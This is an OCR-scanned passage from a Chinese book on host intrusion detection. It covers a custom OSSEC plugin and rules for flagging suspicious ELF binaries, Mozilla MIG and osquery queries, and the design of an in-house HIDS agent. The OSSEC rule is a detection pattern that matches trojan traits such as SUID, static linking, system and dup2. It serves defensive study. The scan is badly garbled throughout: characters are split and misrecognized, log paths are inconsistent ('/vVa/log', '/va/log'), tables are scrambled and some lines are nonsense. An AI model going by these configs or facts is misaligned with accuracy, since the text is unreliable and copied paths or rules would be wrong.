发 扫 搬 插件 ， 壁 如 说 木马 检测 场景 中 ， 你 需要 关注 服务 右上 狐 增 了 那 
些 可 执行 文件 ， 以 及 这 些 文件 的 基础 检测 数据 : ELF\PE 文 件 信息 ; 
inode 信 息 ; 编译 时 间 ; owner_uid; owner name; 符号 表 有 哪些 高 危 或 


敏感 画 数 。 重 点 关注 的 信息 : 
:是 否 设置 位 权限 (每 次 启动 可 以 拿 到 root 权 限 ) ° 
是否 静态 编译 (黑客 为 了 避免 环境 依赖 等 问题 通常 静态 编译 ) 。 
-是否 非 工 作 时 间 (黑客 通常 不 在 工作 时 间 入 侵 ) 编译 。 


是否 继 承 了 某 些 攻击 面 服务 进程 属 主 账户 (比如 
Apache\MySQL) ° 


.是否 有 木马 常用 的 函数 (执行 命令 system， 重 定 癌 输出 dup， 
DDoS 中 多 线程 pthread_creat，Linux 环 境 常 见 网 络 服 务 多 线程 模型 用 得 


RES 


新 增 的 扫描 工具 添加 到 crontab 周 期 性 运行 ， 并 将 结果 写 入 日 
志 /vVa/log/Sensitive_elf， 设 定 的 日 志 格 式 在 OSSEC Server 端 规则 中 需要 
解析 。 壁 如 一 条 新 增 elf 文 件 的 扫描 信息 上 报 如 下 : 


Permission:S_ISUID|linked:static|inode:606356|ctime:22|owner_uid:501|owner_name:no 
body|function:system, dup2, pthread_creat 


2) 添加 新 的 数据 采集 一 一 新 增 工 具 部 署 完 毕 之 后 ， 需 要 修改 
ossec-agent.conf 文 件 ， 新 增 日 志和 采集 配置 : 


<localfile> 
<log_format> Sensitive_elf </log_format> 
<location>/va/log/Sensitive_elf </location> 
</localfile> 


3) 开发 解析 \ 检 测 规则 一 一 当 数 据 从 agent 端 采集 到 Server 端 之 后 ， 
第 一 步 是 需要 解析 格式 化 ， 这 时 需要 修改 的 就 是 decoder.xml， 通 过 对 
它 的 配置 ， 可 以 让 OSSEC 能 提取 你 日 志 里 的 关键 信息 。 


接 下 来 到 告警 规则 ， 在 OSSEC 安 装 上 日 录 的 etc/rule/ 目 录 下 新 增 一 个 
xml 配 置 文件 ， 比 如 Sensitive_elf.xml ° 


继续 按 前 述 “ 新 增 可 疑 ELF 文 件 ” 场 景 举例 ， 新 增 一 个 检测 规则 插 
壕 “ 当 新 增 的 ELF 文 件 包含 任意 3 个 危险 特征 判断 为 高 危 文 件 "， 那 么 规 
则 如 下 : 


<rule id="54321" level="3"> 
<match>SUID| static |nobody||system|dup2|pthread_creat</match> 
<description>dangerous execute binary file.</description> 
</rule> 
<rule id="543210" level="10" frequency="3"> 
<if_matched_sid>54321</if_matched_sid> 
<same_source_ip /> 
<description>dangerous execute binary file.</description> 
</rule> 


8.1.2 MIG 


Mozilla InvestiGatora:— “SIT RAJI EAPO, ABER EPO IS 
意义 上 的 HIDS， 但 功能 与 HIDS 类 似 ， 它 主要 作用 是 通过 消息 队列 
Active MQ 在 分 布 式 的 agent 上 执行 系统 检查 命令 然后 返回 结果 ， 目 前 包 
含 4 个 模块 ， 分 别 是 : 文件 (file) 、 网 络 (network) 、 内 存 

(memory) 、 漏 洞 (vuln) ， 如 表 8-1 所 示 。 


表 8-1 MIG 对 各 平台 支持 的 功能 


功能 Linux Macos windows 
文件 检测 V M vV 
网 络 检测 v vV (计划 中 ) 
内 存 检测 V vV vV 
漏洞 管理 vV (计划 中 ) (计划 中 ) 
系统 审计 (计划 中 ) (计划 中 ) (计划 中 ) 


MIG 系 统 架 构 如 图 8-5 所 示 。 


Action 
Command 
Event 


EGS 


Private Key 
Investigators 
(OpSec) 


DP 令 令 @ 


Public Key 


图 8-5 ” MIG 系统 架构 图 


从 这 张 图 可 以 看 出 MIG 具 备 了 现代 HIDS 架 构 的 锥 形 ， 但 是 整体 上 
MIG 偏 向 于 事后 的 取证 ， 而 不 是 实时 的 入 侵 检 测 ， 所 以 只 部 署 MIG 还 
不 能 实现 主机 侧 的 入 侵 检测 ， 必 须 辅 之 以 其 他 的 Agent， 如 OSSEC 或 


Osquery 等 。 


下 面 是 一 些 比 较 直 观 的 MIG 适 合 干什么 的 列子 ; 


[ulfrefedbox2 ~]$ mig netstat -e 20s -ci 62.210.76.92 


ssh1.corpdmz.scl3.mozilla.com found connected tuple 62.210.76.92:45432 with local tuple 10.22 
.72.158:22 for netstat connectedip: '62.210.76.92' 


[ulfrefedbox2 ~]$ §j 


如 果 你 知道 一 个 攻击 特征 ，MIG 能 够 迅速 帮 你 查找 哪些 服务 器 上 
拥有 这 些 特征 : 


ile -e 20s -path /var/log -name "“^secure$” -content "publickey for jve 


ip-172-19-254-253.usel.opsec.mozilla.com /var/log/secure [lastmodified: 2015-04-21 14:36:56.22 
, $ize:142744] in search 's1' 

ig-admin-prod1.usel.moz-opsec.mozilla.com /var/log/secure [Llastmodified: 2015-04-21 14:23:04. 
127260834 +0000 UTC, mode:-rw , $1ze:2671887] in search “S1 
ppsec!l.private.phx1.mozilla.com /var/log/secure [lastmodified: 2015-04-21 14:15:23.751627611 + 
POOO UTC, mode:-rw , $ize:23430] in search 's1’ 

ssh1.corpdmz.scl3.mozilla.com /var/log/secure [lastmodified: 2015-04-21 14:37:38.191861541 +00 
2O UTC, mode:-rw , $ize:2374435] in search 's1’ 


[ulfrefedbox2 ~]$ J 


同样 ， 如 有 果 你 得 知 discuz 某 个 版 本 的 程序 有 漏洞 ， 你 可 以 通过 文件 
指纹 (SHA256 哈 希 值 或 其 他 ) 迅速 查找 匹配 的 机 器 ， 用 以 调查 哪些 地 
方 需要 修补 。 


AE EX TROM E MIG Fae ° 


Facebook 的 开源 项 目 OSquery 这 个 东西 在 国内 比较 冷门 ， 它 不 能 
完全 的 HIDS， 也 不 能 说 是 完全 为 了 安全 而 设计 的 ， 有 一 部 分 应 该 是 
于 运 维 的 需求 。 它 的 实现 是 把 操作 系统 当做 一 个 数据 库 ， 各 种 系统 
恩 可 以 用 SQL 语句 的 方式 来 查询 ， 如 下 所 示 : 


Kp 


一 般 人 可 能 不 会 把 它 联 想到 是 一 个 安全 强 相关 的 系统 ， 但 是 我 们 
摘 取 一 些 它 文 持 的 查询 项 来 看 : 


> SELECT address, mac, id.interface 
FROM interface details AS id, interface addresses AS ia WHERE id.interface = ia.interface; 


| com.apple.kec.corecrypto 
| com.apple.iokit.IOACPIFamily 
| com.apple.iokit.IOPCIFamily 


SELECT 
u.username, 
g.name as groupname, 
u.directory, 
u.description 
FROM users AS u 
JOIN groups AS g ON u.gid = 
LIMIT 5; 


I 
' 
I 
' 
' 
' 
I 
' 
' 
' 
I 
' 
I 
1 
I 
' 
' 
I 
I 
' 
I 
+ 


Wet ied, ete od 


| username description 


1 
| 
J 
i 
1 
1 
1 
i 
! 
1 
1 
1 
1 
j 
! 
1 
1 
1 
! 
i 
+ 


AMaViS Daemon 
AppleEvents Daemon 
Application Owner 
Application Server 
Apple Remote Desktop 


| _amavisd _amavisd | /var/virusmails 
| _appleevents | appleevents | /var/empty 
| _appowner _appowner | /var/empty 
| i as _appserverusr | /var/empty 
| _ard | /var/empty 


Ea 
| 

+ 
| 
| 
| 
| 
| 

a 


' 
| 
1 
I 
1 
! 
! 
1 
1 
1 
' 
' 
1 
| 
i 
j 
! 
' 
! 
! 
+ 


于 一 一 一 一 一 一 一 一 一 -一 一 一 ~ 
osquery> .exit 
[osquery] ~ exit 


socket_events 


Track network socket opens and closes. 


Column 

action 

pid 

path 

fd 

success 
family 
protocol 
local_address 
remote_address 
local port 
remote_port 
socket 

time 


uptime 


Type 


TEXT_TYPE 
BIGINT_TYPE 
TEXT_TYPE 
TEXT_TYPE 
INTEGER_TYPE 
INTEGER_TYPE 
INTEGER_TYPE 


TEXT_TYPE 


TEXT_TYPE 


INTEGER_TYPE 
INTEGER_TYPE 


TEXT_TYPE 


BIGINT_TYPE 


BIGINT_TYPE 


Description 


The socket action (bind, listen, close) 
Process (or thread) ID 
Path of executed file 


The file description for the process socket 


The socket open attempt status 


The Internet protocol family ID 


The network protocol ID 


Local address associated with socket 


Remote address associated with socket 
Local network protocol port number 
Remote network protocol port number 
The local path (UNIX domain socket only) 
Time of execution in UNIX time 


Time of execution in system uptime 


file_events 


Track time/action changes to files specified in configuration data. 


[Column 

| 

| category 
action 
transaction_id 
inode 


uid 


sha256 
hashed 


time 


process events 


| TEXT_TYPE 


Type 


TEXT_TYPE 


|TEXT_TYPE 
|BIGINT_TYPE 


BIGINT_TYPE 


BIGINT_TYPE 


|BIGINT_TYPE 
| TEXT_TYPE 


|BIGINT_TYPE 


‘Owning group ID 


Description 


The path associated with the event 


The category of the file defined in the config 


Change action (UPDATE, REMOVE, etc) 


ID used during bulk update 


Filesystem inode number 


Owning user ID 


Permission bits 


Size of file in bytes 


'BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 


TEXT_TYPE 


TEXT_TYPE 


TEXT_TYPE 


INTEGER_TYPE 


|BIGINT_TYPE 


Track time/action process executions. 


Column 
pid 
path 
mode 
cmdline 
cmdline_size 
environment 
environment_count 


environment_size 


Type 


Last access time 

Last modification time 

Last status change time 

The MD5 of the file after change 
The SHA1 of the file after change 
The SHA256 of the file after change 


1 if the file was hashed, 0 if not, -1 if hashing failed 


Time of file event 


Description 


BIGINT_TYPE 
TEXT_TYPE 
BIGINT_TYPE 
TEXT_TYPE 
BIGINT_TYPE 
TEXT_TYPE 
BIGINT_TYPE 


BIGINT_TYPE 


Process (or thread) ID 

Path of executed file 

File mode permissions 

Command line arguments (argv) 

Actual size (bytes) of command line arguments. 
Environment variables delimited by spaces 
Number of environment variables 


Actual size (bytes) of environment list 


A, 


Column 

uid 

euid 

gid 

egid 
owner_uid 
owner_gid 
create_time 
access time 
modify_time 
change_time 
overflows 
parent 

time 


uptime 


Type 
BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 
TEXT_TYPE 
BIGINT_TYPE 
BIGINT_TYPE 


BIGINT_TYPE 


跟 安 全 相关 的 项 目 不 止 这 些 ， 


Description 

User ID at process start 

Effective user ID at process start 
Group ID at process start 
Effective group ID at process start 
File owner user ID 

File owner group ID 

File creation in UNIX time 

File last access in UNIX time 

File modification in UNIX time 

File last metadata change in UNIX time 
List of structures that overflowed 
Process parent's PID 

Time of execution in UNIX time 


Time of execution in system uptime 


因 篇 幅 关 系 不 过 多 列举 ， 这 些 碍 询 
项 乍 一 看 都 很 不 起 腿 ， 不 是 直接 可 以 检测 安全 的 选 


， 大 多 数 部 不 足 


以 判断 有 无 攻击 或 者 是 否 被 装 了 rootkit， 但 是 如 果 周 期 性 地 轮 询 这 些 信 


检测 是 


过 消息 队列 将 关键 信息 发 送 到 云端 进 
进程 树 模 型 对 比 ， 束 能 


行 如 文件 的 完整 性 对 比 、 


否 正在 遭受 入 侵 、 被 提 权 、 说 攻击 者 创 


建新 的 进程 等 。 能 否 实现 实时 入 侵 检测 的 关键 在 于 你 采集 数据 的 维度 


和 云端 的 检测 方法 。 


use 


大 多 数 人 的 思路 可 能 
这 可 能 也 是 导致 OSquery 冷 门 的 一 个 原因 。 


还 停留 在 Agent 直 接 告 警 的 年 


作为 一 个 2014 年 开源 的 项 目 ， 它 也 有 一 些 不 足 之 处 ， 比 如 文 持 的 


版 本 有 限 ， 目 前 只 支持 Apple OS X Mavericks & Yosemite, Linux 


CentOS 6.6/7.0 和 Ubuntu LTS (12.04/14.04) ， 其 他 版 本 需要 安全 团队 
中 有 开发 人 员 做 兼容 性 适 配 。 


如 果 要 正式 在 服务 器 上 使 用 OSquery， 它 还 不 是 一 个 成 品 ， 因 为 本 
身 只 是 一 个 Agent 程 序 ， 不 是 一 个 完整 的 HIDS， 从 日 志 素 合 开始 到 云端 
分 析 的 大 数据 平台 以 及 管理 端 都 需要 自己 去 实现 ， 只 有 实现 了 这 些 才 
算是 一 整套 的 平台 ， 光 有 平台 也 还 不 行 ， 还 要 定义 BI 的 那些 事情 ， 采 
集 哪些 ， 分 析 什 么 ， 对 于 不 够 的 数据 采集 点 可 以 自行 开发 插件 。 


总 之 ，OSquery 适 合 于 有 一 定 IDC 规 模 的 企业 ， 安 全 团队 有 一 定 的 
开发 能 力 ， 并 且 对 入 侵 检测 有 基于 大 数据 理解 的 环境 。 


8.1.4 自 研 Linux HIDS 系 统 


互联 网 公司 业务 的 急速 扩张 ， 也 让 各 大 公司 的 生产 网 环境 急速 脱 
胀 ， 以 至 于 他 们 的 生产 网 安全 对 抗 也 变 得 更 加 复杂 ， 使 得 几乎 很 难 有 
一 个 可 直接 照搬 或 者 购买 部 署 的 HDS 产 品 能 满足 需求 ， 主 要 原因 如 
下 : 


海量 环境 需求 & 迭代 

O 商业 产品 价格 昂贵， 不 宜 海量 部 闭 口 业界 产品 不 适应 互联 网 企业 业务 变化 

带 来 的 安全 风险 快速 变化 

口 业界 常见 产品 数据 处 理性 能 不 能 满足 需求 。 口 外 部 产品 无 法 快速 变更 应 对 新 漏洞 、 

攻击 手法 

口 核心 业务 数据 需要 有 可 控 管 理 口 侵入 性 较 强 的 产品 ， 不 易 采 用 外 部 产 
品 ， 外 部 厂商 无 法 快速 响应 


综 上 原因 ， 往 往 各 大 互联 网 公司 都 会 考虑 自 研 HIDS 类 系统 ， 并 量 
这 类 HIDS 也 未 必 是 市 面 上 的 通用 HIDS 模 式 ， 会 根据 企业 自身 的 安全 风 
险 以 及 生产 网 架构 适当 调整 风格 ， 架 构 也 有 各 目的 独到 上 自 处 。 


LÆT 


虽然 HIDS 在 一 个 企业 的 安全 体系 中 几乎 成 了 一 个 基础 设施 般 的 存 
在 ,但 在 架构 设计 之 初 ， 第 一 步 是 还 古 需 要 梳理 清楚 上 自己 的 安全 需 
求 ， 以 及 起 样 适 合 企业 日 映 运 维 体系 ， 才 能 有 更 适合 目 映 的 架构 。 


行业 法 规 需 求 一 一 行业 法 规 这 里 指 上 市 公司 审计 要 求 ， 等 级 保护 
等 。 通 凋 要 求 要 求 对 系统 账户 登录 有 记 隶 ， 有 退 洲 审计 能 力 。 


:基础 安全 需求 一 一 基础 安全 需求 来 自 于 常见 入 侵 场 景 检测 能 力 要 
求 ， 一 般 逐 一 对 应 渗透 入 侵 的 各 个 环节 的 检测 能 力 。 如 : 端口 扫 摘 、 
SQLIÈA ` MAIA ` webshell ` KERE ` IRER ` HEN ` UFEN 


ZE o 
可 


-企业 目 身 的 特殊 安全 风险 需求 一 一 根据 分 析 历 史 安 全 事件 复 盘 和 
基线 安全 数据 ， 推 导出 的 企业 自身 存在 的 特定 安全 特点 和 场景 ， 为 解 
决 此 类 场景 专 设 的 能 


` 运 维 体系 \ 网 络 环境 适应 一 一 根据 前 述 的 风险 需求 分 析 选 择 更 适合 
自身 的 架构 ， 比 如 风险 主要 来 自 Web 攻 击 ， 那 么 HIDS 未 必需 要 做 内 核 
模块 功能 ， 但 如 果 是 云 租户 环境 则 不 同 ， 因 为 云 租户 受到 的 攻击 各 种 
各 样 ， 往 往 很 容易 就 被 攻击 拿 到 root 权 限 ， 甚 至 会 有 更 多 的 横向 渗透 过 
程 ， 那 么 在 内 核 态 是 有 必要 有 安全 措施 的 。 


HIDS 基 本 是 CS 架构 ， 与 传统 安全 软件 不 同 的 是 ， 现 在 互联 网 公司 
的 生产 网 环境 对 系统 性 能 极为 敏感 ， 通 党 对 安全 系统 提出 较为 苛刻 的 
系统 资源 消耗 指标 要 求 ， 加 之 为 快速 应 对 新 型 风险 的 检测 能 力 ， 使 得 
主要 的 计算 分 析 基 本 迁移 到 后 端 进行 ， 前 端 仅仅 以 数据 采集 为 主 。 
HIDS 系 统 涤 构 如 图 8-6 所 示 。 


T A gents q 
数据 分 析 
Linux Agent 
储 \ 查询 
ae 
> 
S 
L Windows Agent, 管理 控制 台 


图 8-6 ”HIDS 系 统 架 构 


在 超大 型 网 络 里 ， 为 考虑 容 灾 ， 以 及 海量 服务 右 和 海量 数据 的 性 
能 压力 ， 整 套 HIDS 系 统 还 会 拆 分 成 多 个 层级 。 第 一 级 可 按 机 房 或 景 地 
区 数据 中 心 划分 ， 每 个 部 署 单元 设立 两 个 以 上 接 入 Server 作 为 容 灾 备 
份 。 在 运 写 过 程 中 ， 我 们 会 发 现 大 量 垃 圾 数据 、 脏 数据 ， 考 虑 到 路 区 
域 传输 对 带宽 的 影响 以 及 减少 后 端 无 意义 计算 ， 可 以 将 第 一 级 数据 分 
析 & 格 式 化 中 心 就 近 部 署 ， 仪 将 过 滤 之 后 的 高 价值 数据 向 后 面 数 据 计算 
存储 集群 传输 。 


2.Agent 功 能 模块 


Agent 分 三 个 部 分 ， 安 全 功能 模块 、 数 据 传 输 、 管 理 模块 。HIDS 
Agent? #4) 4018-7 FT 7s ° 


Agent 


图 8-7 HIDS Agent 架 构 


安全 功能 模块 是 整个 Agent 的 核心 部 分 。 各 个 功能 模块 既 可 以 以 单 
独 进 程 也 可 以 以 线程 模式 存在 ， 建 议 用 独立 进程 模型 ， 因 为 避免 因 单 
个 BUG 影 响 整个 Agent 系 统 的 稳定 性 。 这 里 的 各 个 子 模块 的 功能 是 对 应 
于 不 同安 全 需求 的 ， 每 个 公司 根据 目 身 风险 推导 出 的 需求 不 一 定 相 
同 ， 这 里 列举 常见 模块 。 


1) 基线 安全 一 一 基线 数据 可 以 说 是 一 个 古老 但 不 能 舍弃 的 标 配 ， 
采集 主机 上 配置 版 本 信息 。 主 要 针对 两 类 需求 : 安全 视角 的 软 资产 管 
HE; 0day 应 急 。 当 新 出 现 一 个 0day， 需 要 通过 基线 数据 及 时 知晓 企业 
自身 网 络 环境 里 受 影响 的 范围 有 多 大 ， 并 能 直接 导出 iplist 等 信息 ， 并 


引导 应 急 啊 应 下 一 步行 动 。 此 模块 的 采集 方式 ， 在 Linux 系 统 下 以 读 取 
解析 文本 配置 为 主 ， 辅 以 某 些 二 进 制 文件 的 ELF 格 式 解析 ; Windows 系 
统 通 过 读 取 注册 表 和 组 集 略 信息 可 完成 采集 。 


可 采集 的 数据 包括 但 不 限于 以 下 信息 : 


:系统 版 本 ，Linux 发 行 版 版 本 和 内 核 版 本 包括 内 核 热 补丁 等 ; 
Windows EEIT (微软 官方 补丁 公告 中 注册 表 项 ) 信息 ; 


系统 账户 ，Linux 可 直接 取 passwd 文 件 或 仅 解析 提取 其 中 部 分 信 
轧 ， 如 账户 名 、 权 限 、 以 及 shadow 里 的 密码 最 后 一 次 修改 时 间 ; 
Windows 取 账户 权限 、 权 限 组 、 最 后 登录 时 间 ; 


:系统 关键 文件 MD5 
:应 用 服务 版 本 ， 诸 如 sshd\ftp\telnetd\RDP 版 本 信息 


第 三 方 应 用 服务 版 本 ， 


apache\nginx\tomcat\IIS\mysql\sqlserver\oracle 版 本 信息 


.第 三 方 服 务 配 置 文件 ，webserver 配 置 文件 ，web 根 目录 路 径 ， 局 
动 账户 权限 ， 支 持 的 method\CGT\ 第 三 方 模块 信息 ; php 配置 ， 版 本 信 
息 ， 安 全 配置 项 开关 情况 如 


safe_mode\disable_function\magic_quotes_gpc\safe_mode_exec_dir\safe_m 


ode_include_dir\allow_url_includeS; 


-webapp 版 本 ， 


discuz\phpwind\phpbb\wordpress\thinkphp\phpcms\dedecms\struts\xwork 


2E o 
TS 


2) 日 志 采 和 集 一 在 较 早 的 HIDS 设 计 里 日 志 采 和 集 也 是 标 配 ， 甚 至 是 


最 核心 功能 。 但 事实 上 日 志 里 的 信息 量 较 为 有 限 ， 
段 ， 沼 规 日 志 已 不 能 哦 覆盖 其 攻击 面 和 攻击 问 量 。 
iB: 


‘Linux #2 A 

.Syslog 默 认 日 志 : /var/log/message 
系统 服务 登录 记录 : /var/log/secure 
系统 账户 登录 记录 : /var/log/secure 
-Windows 系 统 


:应 用 服务 日 志 : application (不 少 第 三 方 服务 


如 sqlserver\Symantec\serv-U 等 ) 


P3 


ZEHE: security 


:系统 日 志 : system 


大 量 新 的 攻击 手 
采集 的 日 志 内 容 如 


日 志 也 会 写 入 这 里 ， 


-Webserver 
.所 有 的 webserver 日 志 ， 包 括 apachevnginxvtomcatIS 等 


扩展 插件 日 志 


:这 里 指 在 AGENT 发 布 时 没有 的 功能 ， 和 暂时 用 小 程序 或 脚本 应 急 产 
生 的 日 志 ， 可 通过 修改 HIDS 配 置 采集 解析 上 报 。 男 一 种 技巧 就 是 可 将 
临时 小 程序 的 日 志 输 出 到 系统 日 志 ，Linux 的 syslog 或 Windows 的 


application 日 志 中 。 


3) 进程 信息 一 一 相 比 前 面 几 个 ， 这 是 几乎 所 有 HIDS 都 有 的 标 配 模 
块 ， 进 程 信息 数据 在 入 侵 检测 方面 页 献 的 价值 更 大 。 在 Linux 系 统 
几乎 所 有 的 运 维 操作 以 及 入 侵 行为 都 会 体现 到 执行 的 命令 中 。 所 以 进 
程 命令 信息 无 论 是 作为 运 维 操作 审计 ， 还 是 入 侵 行为 分 析 都 有 极 大 帮 
助 。 


进程 信息 获取 技术 方案 选择 如 下 : 


-周期 性 贺 历 /proc。 这 是 风险 最 小 的 方案 ， 部 嗜 适 配 性 最 强 。 但 缺 
点 明显 ， 实 时 性 无 法 得 到 保障 ， 且 性 能 才 


用 户 态 Hook Libc 函 数 。 相 比 前 面 一 种 方案 ， 风 险 相 对 高 一 点 ， 特 
别 在 多 线程 进程 中 要 注意 安全 性 。 但 其 部 署 适 配 性 也 特别 高 ， 同 时 性 
能 也 是 各 种 方案 最 好 的 ， 建 议 作为 首要 选择 。 虽 然 libc hook 方 式 可 能 


被 绕 过 的 风险 ， 但 如 有 果 对 抗 主 要 集中 在 Web 入 侵 场景 ， 基 本 是 无 需 担 心 
的 。 


.利用 LSM 模 块 接 口 。 如 果 对 抗 必须 深入 系统 级 攻防 ， 那 么 通过 内 
核 态 获 取 进 程 数据 就 非常 必要 了 。 但 是 为 了 安全 性 、 适 配 性 考虑 ， 采 
用 LSM (Linux security module) 开发 接口 就 是 较 佳 的 选择 。Fackbook 
安全 团队 开发 的 OSquery 束 是 使 用 了 LibAudit 获 取 execve 调 用 信息 。 


内核 态 syscall HOOK， 安 全 类 的 开发 最 惯性 的 思维 就 是 内 核 态 
HOOK， 反 倒 不 是 什么 新 鲜 的 招式 。 但 是 这 样 的 方案 未 必 都 适合 大 范 
围 使 用 ， 作 为 一 个 可 能 要 大 量 部 署 的 安全 系统 来 说 ， 不 是 一 个 最 佳 选 
择 。 在 Linux 环 境 里 各 种 发 行 版 和 内 核 版 本 差异 很 大 ， 以 至 于 需要 维护 
多 个 兼容 性 版 本 ， 同 时 稳定 性 也 难以 保证 。 这 类 方案 通常 是 开发 一 个 
LKM 模 块 实现 。 


如 果 仅 仅 是 记录 进程 派生 事件 ， 通 稼 仅 需要 少数 几 个 字段 即 可 。 
但 是 建议 在 设计 数据 结构 (字段 ) 的 时 候 ， 先 将 数据 的 使 用 场景 想 清 
楚 ， 这 样 或 许 你 需要 的 字段 信息 将 会 更 多 ， 同 时 输出 的 字段 既 不 浪费 
传输 带宽 和 存储 空间 ， 还 能 最 大 化 的 服务 于 使 用 场景 。 表 8-1 是 建议 使 
用 的 字段 。 


表 8-1 建议 使 用 字段 


字段 描述 数据 类 型 
Pid 进程 ID Int 
Path 可 执行 文件 绝对 路 径 TEXT 
mode 可 执行 文件 权限 Int 
Cmdline 进程 命令 行 TEXT 
ENV 进程 执行 环境 变量 TEXT 
Uid 启动 进程 的 用 户 uid Int 
Euid 启动 进程 的 用 户 euid Int 
Gid 启动 进程 的 用 户 gid Int 
egid 启动 进程 的 用 户 egid Int 
( 续 ) 
字段 描述 数据 类 型 
sid 进程 会 话 组 ID Int 
ppid 父 进程 id Int 
ppath 父 进程 可 执行 文件 绝对 路 径 TEXT 
pemdline 父 进程 命令 行 TEXT 
Owner_uid 可 执行 文件 属 主 uid Int 
Owner gid 可 执行 文件 属 主 gid Int 
Create_time 可 执行 文件 创建 时 间 bigint 
Modify_time 可 执行 文件 修改 时 间 bigint 
time 进程 启动 时 间 bigint 


数据 使 用 中 有 几 个 技巧 如 下 : 


-mode 字 段 ， 在 规则 检测 (数据 分 析 ) 过 程 ， 会 发 现 一 个 无 法 解释 
的 情况 ， 某 些 root 权 限 执行 的 进程 的 父 进程 是 低 权 限 ， 不 符合 系统 进程 
派生 原则 。 那 么 这 里 可 能 有 几 种 情况 : 


a) 有 人 利用 系统 漏洞 提升 了 进程 权限 ， 可 直接 告警 。 


b) sudo 执 行 ， 可 通过 父 进程 pcmdline\ppath 辨 别 。 


c) 设置 了 S 位 的 可 执行 文件 ，mode 字 段 的 意义 就 在 于 可 将 S 位 可 
执行 文件 运行 事件 与 漏洞 提 权 行为 区 别 开 。 


ENV 字 段 ， 接 上 条 “sudo 提 权 行 为 可 通过 父 进 程 为 sudo 来 辨别 ”， 

可 是 在 很 多 发 行 版 里 sudo 运 行 可 执行 文件 ， 在 进程 记录 里 父 进程 不 是 
sudo， 而 是 父 进程 的 父 进程 ， 原 因 在 于 execve 调 用 的 进程 派生 方式 ， 它 
是 将 子 进程 的 ELF 文 件 映 像 加 载 到 内 存 里 并 执行 ， 也 就 是 sudo 和 被 执行 
的 进程 :共用 一 个 进程 空间 ;， 但 在 我 们 记录 的 进程 信息 这 个 时 间 切 片 这 
里 已 经 是 新 进程 了 。 那 么 难道 没有 办 法 了 吗 ? 这 里 融 用 得 到 环境 变量 
里 的 信息 了 ，sudo 执 行 的 进程 ， 进 程 的 环境 变量 信息 会 新 增 3 个 环境 变 
量 信息 SUDO_COMMAND\SUDO_USER\SUDO_UID， 通 过 这 三 个 变 
量 就 能 判断 当前 进程 是 否 是 被 sudo 启 动 的 。 


4) 网 络 连 接 信息 一 一 网 络 连 接 信息 分 三 类 需求 : 连通 性 数据 采 
集 ， 用 于 分 析 违 规 ACL 和 可 疑 网 络 连接 ， 用 于 恶意 行为 检测 的 数据 需 
求 ， 用 于 检测 木马 等 场景 ， 监控 探测 扫 摘 行为 。 


获取 网 络 连接 信息 ， 走 一 个 较为 消耗 性 能 的 工作 ， 无 漏 是 通过 解 
析 /proc 中 网 络 连接 信息 ， 还 是 内 核 消息 。 毕 竞 在 一 个 业务 繁忙 的 系统 
里 ， 网 络 连 毛 事件 相对 超出 进程 信息 事件 多 个 数量 级 ， 设 计 和 使 用 时 
必须 谨慎 。 一 般 通 过 周期 性 解析 以 下 三 个 文件 信息 获取 : 


-/proc/net/rTaw——RAW #427718 ° 


.proc/nettcp 一 一 ITCP 套 接 字 信息 。 
procmnetudp 一 一 UDP 套 接 字 信息 。 


如 果 仅 为 获取 网 络 连接 信息 ， 那 么 五 元 组 束 能 满足 需求 ， 但 为 了 
全 场景 检测 的 数据 分 析 需 要 可 能 还 需 关 联 进程 信息 ， 相 当 于 一 个 定 
制版 netstat。 建 议 字 段 如 表 8-2 所 示 。 


表 8-2 ”建议 字段 


字段 描述 数据 类 型 

Pid 进程 ID Int 
Path 可 执行 文件 绝对 路 径 TEXT 
Direction 网 络 连 接 方向 (监听 \ 外 连 \ 无 状态 ) Int 
Local ip 本 地 IP Int 
Remote_ip 远程 IP Int 
Local_port 本 地 端口 Int 
Remote_port 远程 端口 Int 
Protocol 协议 int 
time 记录 时 间 bigInt 
基于 字段 的 几 个 提示 


ip 字段 ， 这 里 数据 类 型 是 Int， 相 比 text 来 说 int 人 存储 空间 市 省 很 多 ， 
且 方 便 计算 。 


为 减少 “无 意义 数据 ”的 产生 ， 周 期 性 的 数据 提取 但 仅 上 报 增 量 数 
据 。 
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5) webshell 一 一 在 常规 的 互联 网 攻防 里 Web 攻 防 基本 是 一 个 最 常见 
的 场景 ， 而 Web 攻 击 的 整个 流程 里 最 常见 的 是 GET SHELL， 也 束 是 生 
成 一 个 webshell。 当 然 在 入 侵 检 测 里 webshell 检 测 也 成 了 一 个 很 重要 的 
环 条 。 技 术 方 案 选 择 如 下 : 


inotify 文 件 监 控 ，Linux 系 统 里 的 webshell 检 测 ， 最 重要 也 是 几乎 公 
认 的 技术 就 是 inotify， 在 BSD 和 macOS 里 类 似 的 是 kqueue。 从 Linux 内 核 
从 2.6.13 开 始 引 入 inotify，inotify 是 一 种 文件 变化 通知 机 制 ， 几 乎 所 有 
Linux 发 行 版 都 文 持 ， 可 以 通过 以 下 命令 看 你 的 系统 是 否 文 持 ; 


% grep INOTIFY_USER /boot/config-$(uname -r) 
CONFIG_INOTIFY_USER=y 


.如 果 显 示 CONEFIG_INOTIFY_USER=y 则 说 明 支 持 。 


.如 有 宁 不 文 持 inotify， 那 么 很 站 憾 ， 不 得 不 周期 性 过 历 Web 目 永 来 做 
仿 测 ° 


6) DB 审计 一 一 企业 的 核心 资产 通常 是 数据 ， 用 户 数 据 、 销 售 数 
据 、 产 品 数据 、 财 务 数据 等 等 ， 那 么 DB 的 安全 保护 就 成 为 了 重 中 之 
重 。 安 全 厂商 不 乏 大 量 的 DB 安全 产品 ， 根 据 产品 的 不 同形 态 ，DB 安 全 


(审计 ) 产品 可 以 是 一 个 独立 的 系统 ， 也 可 以 作为 HIDS 的 一 个 模块 存 
在 。 


当 作为 HIDS 的 一 个 模块 存在 的 时 候 ， 产 品 方案 必定 是 部 署 于 主机 
的 ， 这 样 市 来 的 好 处 最 重要 是 复 用 了 HIDS 系 统 的 控制 管理 指令 通道 以 
及 数据 传输 通道 ， 同 时 跟 更 贴近 DB 服务 端 避免 了 攻击 流 旁 路 绕 过 的 可 
fE o BERRAET, RRRA a H ARIRAN o 


3. 数 据 传输 


与 传统 HIDS 以 及 PC 版 HIDS 不 同 的 是 ， 企 业 版 HIDS 通 常 需要 通过 
后 端 数 据 分 析 来 实现 安全 能 力 ， 特 别 是 互联 网 企业 中 ， 为 了 降低 前 端 
